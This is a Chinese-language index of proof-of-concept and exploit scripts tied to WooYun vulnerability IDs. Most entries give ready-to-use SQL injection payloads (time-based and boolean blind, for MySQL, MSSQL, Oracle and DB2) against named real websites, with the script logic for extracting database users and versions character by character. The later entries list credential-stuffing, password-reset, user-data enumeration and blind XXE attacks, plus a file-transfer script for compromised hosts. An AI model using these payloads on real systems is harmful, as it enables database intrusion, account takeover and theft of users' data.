POC && EXP

Profile Photo
脚本编号 注入类型 脚本特征 补充说明
1. wooyun-2010-0126775

GET (ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0) if time.time() - t > 1.5
2. wooyun-2010-0120021

GET aaa'XOR(if(length(user())=20,sleep(3),0))OR'bbb try: except:
3. wooyun-2010-0119102

GET/MySQL time blind (ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0) if(length(user())=22,sleep(2),0
try: except:
同时,该脚本猜解user(),阀值设得很小,
0.5秒超时
4. wooyun-2010-0118298

消息头中Host可注入 GET / HTTP/1.1
Host: www.baidu.com'or(length(user())=14)or'
Referer: http://dns-ch.xinnet.com
if status == 302
5. wooyun-2010-0114907

GET if(ascii(mid(lower(user()),%s,1))=%s,benchmark(2000000,md5(1)),0)   if time.time() - start_time > 0.5:
     timeout_count += 1
  else:
     break
if timeout_count == 3:
      user += payload
6. wooyun-2010-0114492

Cookie注入/MySQL bool blind GET /cart/mini_cart_ajax HTTP/1.1
Cookie: PHPSESSID=c6798728910c94d53a88cd8369b8def5;
csdn_cart_user_id=1"%20OR%20length(user())=23--%20;
if len(html_doc) > 200:
7. wooyun-2010-0106276

POST aa'XOR(if(ascii(mid(lower(user()),%s,1))=%s,sleep(2),0))OR'bb try: except:
if err_count == 3:
8. wooyun-2010-0105690

GET if(ascii(mid(lower(user()),%s,1))=%s,sleep(4),0) try: except:
9. wooyun-2010-0104621

Cookie注入/MySQL bool blind GET /catering HTTP/1.1
Cookie: PHPSESSID=5dc8189e97e848e3bcab3381649061af;
SESSIONID=5dc8189e97e848e3bcab3381649061af;
CITY_ID=*;
if html_doc.find(u'/merchant/detail?storeid=2059629') > 0:
10. wooyun-2010-0103884

POST/MySQL bool blind aa'XOR(if(length(user())=17,sleep(6),0))OR'bb 当表达式为True时,延迟超过6秒。 为False,延迟一800ms左右
try: except:
11. wooyun-2010-0103670

POST 123'xor(sleep(ascii(mid(lower(user()),%s,1))=%s))or #"123'xor(if(%s,sleep(5),0)or'" % s try: except:
12. wooyun-2010-095449

GET if(ascii(mid(lower(user()),%s,1))=%s,sleep(10),0) try: except:
13. wooyun-2010-095438

POST aa'XOR(if("ascii(mid(lower(user()),%s,1))=%s",sleep(5),0))OR'bb try: except:
14. wooyun-2010-095304

POST aa'XOR(if("ascii(mid(user(),%s,1))=%s",sleep(5),0))OR'bb try: except:
15. wooyun-2010-095083

GET/MySQL bool blind 'XOR("ascii(mid(lower(user()),%s,1))=%s")OR'bb" False对应的关键字:No matched winning logo designs
16. wooyun-2010-094912

POST/bool blind and substring(lower(system_user),%s,1)>'%s 为True时页面加载缓慢,于是作为一个time blind示例猜解了system_user
17. wooyun-2010-094880

GET/MySQL bool blind aa'XOR(if("mid(lower(user()),%s,1))=%s",1,0))OR'bb False对应的关键字:No matched winning logo designs
18. wooyun-2010-094603

GET /*'%2b(select(0)from(select(if("ascii(mid(user(),%s,1))=%s",sleep(5),0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/   if time.time() - start_time > 5:
    timeout_count += 1
    print '*',
  else:
    break
if timeout_count == 2:
   user += payload
19. wooyun-2010-094467

POST/MySQL bool blind 'aa"XOR(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))OR"bb 出现“请输入新密码”时为True
20. wooyun-2010-092463

POST %%' and ascii(substr(lower(user),%s,1))=%s and '%%'=' IBM DB2数据库
21. wooyun-2010-090164

GET %s"XOR(sleep(ascii(mid(lower(user())from(%s)for(1)))=%s))OR"bb' % (random.random(), i, ord(payload))
22. wooyun-2010-089831

POST/MySQL bool blind 1 or ascii(mid(lower(user())from(%s)for(1)))=%s if html_doc != '0,0,0,0,0,0,0,0,0,0': # True
23. wooyun-2010-089924

GET /aaa'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(3),3))OR'bb/ 注入格式:http://m.soccer.sina.com.hk/t/注入语句
24. wooyun-2010-089917

POST aa"XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0))OR"bb try: except:
if timeout_count == 3:
25. wooyun-2010-089826

GET if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),3)
26. wooyun-2010-089469

GET/ http://zhidao.baidu.com/c/ah189 and mid(lower(database()),1,1)="c" and "1"="1 if html_doc.find(u'安徽电信企业平台_企业知道_百度知道') > 0:
27. wooyun-2010-089304

POST 123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb raise Exception('oooooooops')
POST数据中sid每次需要重新获取
经典绕过
28. wooyun-2010-088834

GET if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --
29. wooyun-2010-088750

POST if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0)
30. wooyun-2010-088431

GET 123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb
31. wooyun-2010-088294

POST/Oracle bool blind ' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s AND 1=1 -- current_user长度为5  Oracle数据库
32. wooyun-2010-088037

Cookie注入/Mysql bool blind ' OR ascii(mid(database(),%s,1))=%s AND 1=1 -- 表达式为True时,页面返回302;为false,返回200
Cookie中BAIDUID可注入
33. wooyun-2010-087980

消息头中Referer可注入 str(random.random()) + "aaa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(1),0))OR'bbb" GET / HTTP/1.1
Referer: aaa*
34. wooyun-2010-087825

GET 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(2),0))OR'bbb 程序如果误报,是因陷入的线程太多,数据库不稳定
try: except:
35. wooyun-2010-087531

GET/MySQL bool blind (ascii(mid(user(),%s,1))=%s) 为True时,页面有显示照片的div class="upload_one"
36. wooyun-2010-087520

GET "%saa'+(select(0)from(select(sleep(if(ascii(mid(user(),%s,1))=%s,5,0))))v)+'bb" % (rand_num, i, ord(payload))   if resp.status == 502:
     raise Exception('ooooooooops')
     print '.',
 except Exception, e:
    user += payload
37. wooyun-2010-086762

GET if(ascii(mid(user(),%s,1))=%s,sleep(1),0)
38. wooyun-2010-086516

GET sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s))) 不带等号注入
通过sleep函数来猜解单个字符
每次取一个字符的ascii码,与列表中的ascii码逐一对比,取符号的绝对值
如果相等此时为True,则符号是0,绝对值是0,会延迟
若不等,则符号是1或-1,绝对值为1,不延迟
39. wooyun-2010-086372

GET/Mysql bool blind " AND ascii(mid(lower(user())from(%s)for(1)))=%s AND "123"="123 if html_doc.find(u'搜索时间') > 0:
40. wooyun-2010-084379

GET if(ascii(mid(user(),%s,1))=%s,sleep(1),0) 猜到10的时候,MySQL Server已经挂了,不再深入
41. wooyun-2010-084801

GET sleep(ascii(mid(lower(user())from(%s)for(1)))=%s) 页面有检查Referer,测试时需设定
42. wooyun-2010-083899

GET/MySQL bool blind ?? 出现韩都衣舍时为True
43. wooyun-2010-083813

消息头中X-Forwarded-For可注入/MSSQL str(random.random()) + "127.0.0.1'); if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:3' -- " X-Forwarded-For: 127.0.0.1'); waitfor delay '0:0:1' --
当前用户sa  尝试查找SQL Server Version
44. wooyun-2010-083715

GET/MySQL Bool blind AND ascii(mid(user()from(%s)for(1)))=%s AND 'aaa'='aaa 一个比较隐蔽的注射点 第一眼看网页可能没有什么分别
右键查看源代码,可以发现第757行的内容不一样。Bool blind 出现“城北”为True
45. wooyun-2010-083376

MySQL time-based blind/MySQL bool blind and ascii(mid(user()from(%s)for(1)))=%s and '1'='1 测试基于时间的盲注,大约10个sleep陷入,带参数的页面就全挂了
最后使用了bool的MySQL注射
46. wooyun-2010-083257

POST(经典) sleep(ascii(mid(user()from(%s)for(1)))=%s) 后端不稳定,有一定的几率会出现404,因此把http Request的检查写到单独的函数中
404不管,只顾200和502
这里有个小技巧:一个sleep(1=1),后端是不一定502 time out的
因此我是把3个sleep相加,这样就可以保证后端一定会502
47. wooyun-2010-082740

GET 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(4),0))OR'bbb
48. wooyun-2010-083899

GET if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- MSSQL 脚本将获得SQL Server Version
49. wooyun-2010-082690

GET 'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(4),0))OR'bbb
50. wooyun-2010-082564

POST/MySQL bool blind AND ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s-- 如果页面返回到达地“广州”,表示True
51. wooyun-2010-081949

GET(经典绕过) sleep(ascii(mid(user()from(%s)for(1)))=%s) 联想(公司)二次开发引入的Discuz注入,ThinkPad论坛,部分SQL关键字又被过滤了,比如select,因此报错注入的利用有限制
52. wooyun-2010-081844

Cookie注入 if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- MSSQL数据库  SQL Server version is Microsoft SQL Server 2008 SP
53. wooyun-2010-081815

POST if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- MSSQL数据库,脚本将得到数据库版本
55. wooyun-2010-079379

GET (sleep(ascii(mid(user()from(%s)for(1)))=%s)) 不带空格和逗号即可注入
56. wooyun-2015-0137143

XML二次爆破DoS攻击漏洞 POST提交POC
57. wooyun-2015-0100000

撞库攻击 碰撞方式获取大量PNR码
58. wooyun-2015-0109422

任意用户密码重置脚本 密码格式:$md5=md5(time().rand(0,100)); $md5='lock'.substr($md5,5,strlen($md5));
59. wooyun-2015-0119851

撞库攻击 利用burpsuite进行抓包后发现,userID为纯数字,oldPwd可暴力破解,故重置用户密码
60. wooyun-2015-0126008

查询任意用户信息脚本 查看源代码发现,用户的用户名,邮箱,id,电话信息出现在隐藏表单里面
61. wooyun-2016-0172227

简单套接字传文件脚本 把send.py传到肉鸡上,recv.py传到vps上 渗透需要思路
62. wooyun-2015-0120222

读取IOS BinaryCookies的脚本 尝试使用获得的cookie进行越权操作
63. wooyun-2014-088964

撞库攻击 name=用户名&pass=密码MD5 Hash&action=login
64. wooyun-2015-0135483

查询任意用户信息脚本 利用接口查询任意用户信息
65. wooyun-2015-0145012

撞库攻击 企业邮箱一处设计缺陷导致撞库攻击
66. wooyun-2015-0105251

利用接口查询任意用户信息 提交方式:urllib2.urlopen(req, data="")
67. wooyun-2015-0135615

Blind XXE 访问http://**.**.**.**/kv?act=set&k={key}&v={value} 可以在远程主机设置一个键值对 http://**.**.**.**/kv?act=get&k=刚刚的key 可以查看是否设置了这个键值对,以此进行漏洞的验证
68. wooyun-2015-0135356

Blind XXE 没有安全使用simplexml_load_string导致xxe